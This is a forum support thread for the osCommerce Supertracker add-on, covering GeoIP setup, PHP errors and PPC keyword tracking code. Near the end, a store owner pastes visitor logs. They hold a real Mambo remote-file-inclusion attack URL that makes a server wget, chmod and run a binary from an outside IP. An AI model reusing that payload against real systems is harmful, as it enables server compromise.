The e-commerce.

Support Thread for Supertracker Contribution

equilla

If someone has the same problem with "empty delimiter" on line 176:

I've changed the line 176 to:

if (!emtpy($prohibited_pages) && !strpos($prohibited_pages, $current_page))  {

and it seems to work well...

Regards Matthias

Assuming you followed all the instructions, did you get the GeoIP.dat file from the locations specified?

It comes in a zip file and has to be unzipped. It also has to be uploaded in binary mode because it is a binary file. Like images are binary files, pdf's are binary, and html files, text files and so forth are ascii files. If you do not know what the different FTP modes are, do a Google on FTP modes. If you are using an application that has built in FTP, make sure the .dat extension is set to binary mode (not all .dat files are binary! The GeoIP.dat file is tho), and also make sure that whatever application you use does not change uppercase file names to all lower case (some only do it when you upload (should be able to change it in settings for FTP program). (but you can also modify the casing according to these posts: for GeoIP Posts click here)

You also have to make sure the the GeoIP.dat file is spelled correctly. Casing Counts. GeoIP.dat is not the same thing is geoip.dat....

Hope that is the cause of the problem and your fix is quick!!

I checked all the above and all is ok but still get a black page

I checked all the above and all is ok but still get a black page

Hi,

you could try adding this directive at the top of your /catalog/includes/classes/supertracker.php file:

error_reporting(E_ALL);

that should turn on php error reporting so that it shows anything that goes screwy during execution of that file. Hopefully that will cause the problem to be reported on screen and if you can report that back here we should have something more to go on.

Of course, if the error is happening in one of the files being called by supertracker.php, we still may not be any further forward, but anyway, give it a go and let us know what happens.

Regards,

Mark

Anyone have any ideas on my last post, located > HERE < ?

By default, overture adds the ?src=overture which is necessary for their own internals so I can't be alone here. Anyone running an ad campaign will have the same structure... so the links look like this:

http://whackwhack.../index.php?cPath=50_38&ref=yahoo&keyw=best+dog+apparel?src=overture

In the database table for Supertracker, the plus signs are converted to spaces for landing_pages and look like this:

/index.php?cPath=99&ref=yahoo&keyw=dog cushion?src=overture

The total referrals are counted, but none of the data for the keywords is populated as shown in my last post.

I even tried to add the ?src=overture to the keyword array so that the query would be looking for the keyword with the appended '?src=overture' but that didnt work either. The last ten report draws all that data so it is just beyond me why the query is returning completely blank results.

Any help or ideas would be greatly appreciated!

Hi,

you could try adding this directive at the top of your /catalog/includes/classes/supertracker.php file:

error_reporting(E_ALL);

that should turn on php error reporting so that it shows anything that goes screwy during execution of that file. Hopefully that will cause the problem to be reported on screen and if you can report that back here we should have something more to go on.

Of course, if the error is happening in one of the files being called by supertracker.php, we still may not be any further forward, but anyway, give it a go and let us know what happens.

Regards,

Mark

Nothing happens no change just a blank page

Warning: Unexpected character in input: '' (ASCII=1) state=1 in /var/www/o//TML/catalog/includes/geoip.inc on line 712

Warning: Unexpected character in input: ' in /var/www/o/HTML/catalog/includes/geoip.inc on line 712

Parse error: parse error, unexpected T_STRING in /var/www/o/HTML/catalog/includes/geoip.inc on line 712

------------------

receive this error message trying to use the geoip.dat file... combined with supertracker

Please can someone explain the difference between the .dat file and the .inc file

Or can anyone explain how I can transfer the binairy file to my webshop? I'm lost...

HanZ

Grtz

HanZ

-----------

Life is simple, only people make it complicated...

Louis Couperus, Dutch writer (1863-1923)

discovered the problem myself;

Need the GeoIP.dat (mind the writing, capitals!) and a geoip.inc on the catalog/include dir.

problem solved....

Grtz

HanZ

-----------

Life is simple, only people make it complicated...

Louis Couperus, Dutch writer (1863-1923)

Great contribution but the PPC people need some simple documentation.

I've read the entire thread and THINK I might understand.

However, a small document showing how to track PPC for the following would be great.

Google, multiple campaigns, multiple keywords

overture, multiple keywords

maybe a couple others PPC providers.

It seems the confusion is the shortkeyword:long desc and how it relates to campaign names or keywords or both?

I can understand the abbreviation:long desc for reporting purposes, but is it the abbreviation that must match the campaign name or only the keyword used in the that campaign?

thanks for any additional help

Edited by cgchris99

Hi,

I've just had another look at Drive's post again and see the source of the problem. To simulate the situation I set the following config up in the admin supertracker.php files on one of my stores:-

$ppc = array ('yahoo' => array ('title' => 'Yahoo Test', 'keywords' => 'dogcushion:Dog Cushion'));

define ('SUPERTRACKER_USE_PPC', true);

Just to be clear on this, the 'yahoo' part is what you must use in the referring url that you setup in the Campaign Management for whichever PPC provider you are using - the 'Yahoo Test' part can be set to whatever you want, it's just used for display in the reports within osC.

Equally, the 'dogcushion' bit is what is used in the URL and the 'Dog Cushion' bit is used just for display.

I then simulated Drives scenario by manually typing the following url:

http://www.mydomain.com/index.php?ref=yaho...on?src=overture

As expected, I get this in the Supertracker PPC report:-

Yahoo Test - Total Referrals 1

Dog Cushion : 1Refferals , Average Time: 0.000000mins, Average Clicks: 1.0000

Drive - I think your problem stems from fact that you are using 'Dog Cushion' instead of 'dogcushion' within your urls. Also, note that the ?src=overture causes no problems - it is simply ignored.

If I get some time this week, I'll see if I can write a more detailed guide.

Regards,

Mark

Hi,

I've just had another look at Drive's post again and see the source of the problem. To simulate the situation I set the following config up in the admin supertracker.php files on one of my stores:-

$ppc = array ('yahoo' => array ('title' => 'Yahoo Test', 'keywords' => 'dogcushion:Dog Cushion'));

define ('SUPERTRACKER_USE_PPC', true);

Just to be clear on this, the 'yahoo' part is what you must use in the referring url that you setup in the Campaign Management for whichever PPC provider you are using - the 'Yahoo Test' part can be set to whatever you want, it's just used for display in the reports within osC.

Equally, the 'dogcushion' bit is what is used in the URL and the 'Dog Cushion' bit is used just for display.

I then simulated Drives scenario by manually typing the following url:

http://www.mydomain.com/index.php?ref=yaho...on?src=overture

As expected, I get this in the Supertracker PPC report:-

Yahoo Test - Total Referrals 1

Dog Cushion : 1Refferals , Average Time: 0.000000mins, Average Clicks: 1.0000

Drive - I think your problem stems from fact that you are using 'Dog Cushion' instead of 'dogcushion' within your urls. Also, note that the ?src=overture causes no problems - it is simply ignored.

If I get some time this week, I'll see if I can write a more detailed guide.

Regards,

Mark

Thanks Mark, that did the trick! I could have sworn I tried that as I have a spreadsheed with columns that have all the combinations. I can see I MEANT to try it but obviously didn't try that combo. I see now that I got it backwards and the fix was simple all along. Glad for that! Also, I did notice that mine was saying 32Refferals so I added a space to separate them... 32 Refferals. I think it can also be done in the language file but then you have to remember to put a space before the R in Refferals....

$ppc_key_refs . ' ' . TABLE_TEXT_REFERRALS_AVERAGE_TIME

I think what confused me is the Keyword Friendly Names. For me, I need those to be identical to what the keyword combo's are..... easier to read.

So, here is a small snip of my combo's now and it works GREAT! Thanks again Mark.

dog apparel:dog apparel,pet clothing:pet clothing,pet collar:pet collar,pet apparel:pet apparel,pet jewelry:pet jewelry,dog shirt:dog shirt,dog blanket:dog blanket,dog dress:dog dress,dog dish:dog dish,dog charm:dog charm,pet sweater:pet sweater,pet blanket:pet blanket

oh, since I know you will be reading this Im going to put this note here... I also found out that our installation cannot remove rows from the Supertracker table... its because MySQL on that machine is v3.23.*, and on another installation its MySQL v5.0 stable and it works fine... so definitely a problem with running too old a version of MySQL.

I have created test links for the PPC stuff on a different website.

I wanted to see if I could track the links instead of waiting for a real one from google.

I went into phpmyadmin to see if the information is getting recorded and only see one entry from my IP address. I also only see one entry that has a landing page with 'ref=' in it.

How can I test if the PPC is working properly.

right now I have the $ppc line as follows

$ppc = array ('adwords' => array ('title' => 'Google Adwords', 'keywords' => 'test1-CN:Test 1 Content Network,

test2-SN:test2 Search Network,

test3-CN:test 3-CN,

test4-SN:test 4-SN'),

'yahoo' => array ('title' => 'Yahoo', 'keywords' => 'mykeyword:my new keyword'));

The links I was testing with are

http://www.mydomain.com/index.php?manufact...s&keyw=test1-CN

http://www.mydomain.com/mfg-name-m-22.html...s&keyw=test1-CN

Neither of these links seemed to produce a single entry in the supertraker database that I could find.

There are records in the database though. But not the test ones I am entering.

Any ideas?

right now I have the $ppc line as follows

$ppc = array ('adwords' => array ('title' => 'Google Adwords', 'keywords' => 'test1-CN:Test 1 Content Network,

test2-SN:test2 Search Network,

test3-CN:test 3-CN,

test4-SN:test 4-SN'),

'yahoo' => array ('title' => 'Yahoo', 'keywords' => 'mykeyword:my new keyword'));

Ok, I figured it out. The problem was the array code...

Notice the returns after each keyword:description line. I did this to make the editing easier and it caused a problem.

This was causing an extra space at the beginning of the keyword in the array. It would not match when doing a search because 'test2-SN' <> ' test2-SN'

I am doing some formatting of the report to make it look at bit nicer.

Edited by cgchris99

Ok, I figured it out. The problem was the array code...

Notice the returns after each keyword:description line. I did this to make the editing easier and it caused a problem.

This was causing an extra space at the beginning of the keyword in the array. It would not match when doing a search because 'test2-SN' <> ' test2-SN'

I am doing some formatting of the report to make it look at bit nicer.

Chris, will you post the code after you're finished? I assume you are making it more tabular. I was going to do that but I've got too many things going on.... if its good enough, maybe Mark will include it in the next update.... :D

I'll see what I can do about the tabular reporting. I'm only working on the PPC one but it's better than it was.

I also found one small problem that should be looked at. The keywords report.

I have listings like this

Xyz Product 4

XYZ Product 2

xyz product 1

The system should convert these all to lower case before recording them. Obviously it should be

xyz product 7

It's not so bad except when you have 50 items in between each one. Then it's annoying.

Ok, this code is for the admin/supertracker. This updates the PPC report so it is formatted a bit. It's not neat and tidy code but it sure makes a nicer display

it starts right after

//End Special "Last Ten" Report

//PPC Summary report
  if ($HTTP_GET_VARS['special'] == 'ppc_summary') {
 echo '<table width="100%" border=0 cellspacing=0 cellpadding=5 style="border:1px solid #000;">';	 
  foreach ($ppc as $ref_code => $details) {
	  $scheme_name = $details['title'];
		$keywords = $details['keywords'];

$ppc_q = "SELECT * from supertracker where landing_page like '%ref=" . $ref_code . "%'";
		$ppc_result = tep_db_query ($ppc_q);
		$ppc_num_refs = tep_db_num_rows($ppc_result);
		echo '<tr><td colspan="4" style="font-weight:bold;text-decoration:underline;">' . $scheme_name . '(ref='.$ref_code.') - Total Referrals ' . $ppc_num_refs . '</td></tr>';
// display headings
		echo '<tr class="dataTableHeadingRow"><td class="dataTableHeadingContent">  (keyw):Long Desc</td>';
		echo '<td class="dataTableHeadingContent">Referrals</td><td class="dataTableHeadingContent">Avg Time</td><td class="dataTableHeadingContent">Avg Clicks</td>';
		echo '<td class="dataTableHeadingContent"># Purchased</td><td class="dataTableHeadingContent">Conversion Rate</td>';

if ($keywords != '') {
		  $keyword_array = explode(',',$keywords);
		  foreach ($keyword_array as $key => $val) {
			$colon_pos = strpos ($val, ':');
			  $keyword_code = substr($val,0,$colon_pos);
			  $keyword_friendly_name = substr($val,$colon_pos+1,strlen($val)-$colon_pos);
			  $ppc_key_q = "SELECT *, count(*) as count, AVG(num_clicks) as ave_clicks, AVG(UNIX_TIMESTAMP(last_click) - UNIX_TIMESTAMP(time_arrived))/60 as ave_time from supertracker where landing_page like '%ref=" . $ref_code . "&keyw=" . $keyword_code . "%' group by landing_page";
			  $ppc_key_result = tep_db_query($ppc_key_q);
				$ppc_row = tep_db_fetch_array($ppc_key_result);
			  $ppc_key_refs = $ppc_row['count'];

// conversion data
			$ppc_key_p_sql = "SELECT COUNT(*) as conversions FROM supertracker where landing_page like '%ref=" . $ref_code . "&keyw=" . $keyword_code . "%' and completed_purchase='true'";
			$ppc_key_p_array = tep_db_fetch_array(tep_db_query($ppc_key_p_sql));

if ($ppc_key_p_array['conversions'] == 0)
				$conversion_rate  = 0;
			else
				$conversion_rate = ($ppc_key_p_array['conversions']/$ppc_key_refs)*100;

//test
			  echo '<tr class="dataTableContent"><td>('.$keyword_code.'):'.$keyword_friendly_name.'</td>';
			  echo '<td> '.$ppc_key_refs.'</td><td> '.number_format($ppc_row['ave_time'],2).'</td><td> '.number_format($ppc_row['ave_clicks']).'</td>';
			  echo '<td> '.$ppc_key_p_array['conversions'].'</td><td> '.number_format($conversion_rate,2).'%</td>';

}
		}
	}
	echo '</table>';

}//End PPC Summary Report

How long before the tracking session times out?

Is it really 30 minutes?

For PPC, that is not long enough.

Thanks for any thoughts or advice.

Chris,

bear in mind that it is 30 minutes since last click, not 30 minutes since time of arrival. Normally it is safe to assume that a visitor has disappeared for good after this time.

However, I suspect that your question may have been aimed at affiliate style tracking, where a referral comes initially from a PPC campaign, but it may be hours, days or even weeks before the referred customer actually completes a purchase. To do this, we would need to use a cookie.

Regards,

Mark

Actually, I am not using affiliates. However, I do use the PPC. I was just trying to figure out if 30 minutes is long enough to decide if the PPC worked?

So we are saying that if they do not purchase on the intial PPC click then the PPC did not give us any ROI.

Any thoughts?

I'm thinking that for PPC purposes cookies must be used. For other things I think this contribution works great. However, for PPC it needs cookies.

Any thoughts?

I've got some thoughts based on a setup I have. In conjunction with OSC Affiliate, you can integrate it so that you not only track PPC, but also get the useage of cookies for long term tracking, just as you say if someone returns at a later date to make a purchase.

Most PPC services (Yahoo, Overture, etc) allow you to specify components of your URL's to be included when users click from search engines to your site(s). So, you would install OSC Affiliate, assign an internal "affiliate account" to be used specifically for your PPC campaigns, whether you use your own custom links or a bonafide PPC service it will work, though the long-term tracking would now be done through the Affiliate program. You could assign a separate affiliate for each keyword/combo or assign them in groups (keywords a-g belong to affiliate1). The affiliate id becomes part of your URL's, whether constructed for PPC service or custom made links you have elsewhere.

THE ONLY problem is that OSC Affiliate and SuperTracker both use a variable "ref" (never a good variable to be used as it is a shortcut used by many many things). So, what you have to do in conjunction with my method is to take either OSC Affiliate or Supertracker and modify the code so that "ref" is not used by one or the other. This makes it harder to update either one of these Contribs when new code or features come out but it does work. Also, it is clunky to have 100 "affiliates" but it is unlikely that your keywords will change so once set up, you're home-free.

Just my two cents :D Cheers!

Hi...

Im getting an parse error

Parse error: parse error in c:\domains\spellekijn.nl\wwwroot\shop\admin\supertracker.php on line 398

I Checked and double checked the settings but can not find any thing out of de ordinary. The error should be in the time_arival but can't find anything up with it.... When I look in the table content all enteries are well.

<?php

while ($lt_row = tep_db_fetch_array($lt_result)) {

$customer_ip = $lt_row['ip_address'];

$country_code = $lt_row['country_code'];

$country_name = $lt_row['country_name'];

$customer_id = $lt_row['customer_id'];

if ($customer_id != 0) {

$cust_query = "select * from customers where customers_id ='" . $customer_id . "'";

$cust_result = tep_db_query ($cust_query);

$cust_row = tep_db_fetch_array($cust_result);

$customer_name = $cust_row['customers_firstname'] . ' ' . $cust_row['customers_lastname'];

}

else $customer_name = "Guest";

$referrer = $lt_row['referrer'] . '?' . $lt_row['referrer_query_string'];

if ($referrer == '?') $referrer = 'Direct Access / Bookmark';

$landing_page = $lt_row['landing_page'];

$last_page_viewed = $lt_row['exit_page'];

$time_arrived = $lt_row['time_arrived'];

$last_click = $lt_row['last_click'];

$num_clicks = $lt_row['num_clicks'];

$added_cart = $lt_row['added_cart'];

$completed_purchase = $lt_row['completed_purchase'];

$browser_string = $lt_row['browser_string'];

if ($lt_row['products_viewed'] != '') {

$products_viewed = $lt_row['products_viewed'];

$prod_view_array = explode ('*',$products_viewed);

}

else $products_viewed = '';

if($country_code==''){

$country_code='pixel_trans';

}

Edited by tolster

I was browsing through my "Last ten visitors" today, and came across these entries:

Customer IP Address/Country: 61.142.127.152 (China) - 61.142.127.152

Customer Browser Ident: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

Customer Name: Guest

Referred By: Direct Access / Bookmark

Landing Page: /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|

Last Page Viewed: /index.php

Time Arrived: 02/19/2006 11:39:44

Last Click: 02/19/2006 11:39:44

Time on Site:0hrs 0mins 0 seconds

Number of Clicks: 1

Added to Cart: false

Completed Purchase: false

Customer IP Address/Country: 206.225.94.63 (United States) - 206-225-94-63.dedicated.abac.net

Customer Browser Ident: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

Customer Name: Guest

Referred By: Direct Access / Bookmark

Landing Page: /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|

Last Page Viewed: /index.php

Time Arrived: 02/19/2006 10:35:21

Last Click: 02/19/2006 10:35:21

Time on Site:0hrs 0mins 0 seconds

Number of Clicks: 1

Added to Cart: false

Completed Purchase: false

My question (and concern) is the landing pages in these examples. Obviously, it looks nothing like any page in my store, but when I see parts of it that say things like "chmod%20744%20gicumz;" it makes me worry that this is a hack attempt of some type.

Does anyone have an idea of what might be going on here? Are thes legitimate URL's, or am I "UNDER ATTACK!" ?!

Thanks for this awsome contribution!

John

Looks to me like some hack bots looking for a mambo installation.

• 2 weeks later...

Really enjoying this contrib! Thanks for all the hard work. Any idea about the bandwidth or database connections and site load? My site is small, but I want it to remain fast. I'm not concerned about my page load times for supertracker, just the front end. Also, is there an explanation back somewhere on these many pages for using this to tighten down my ppc tracking. I'm already getting the feeling I'm blowing cash at the big G needlessly.

• 2 weeks later...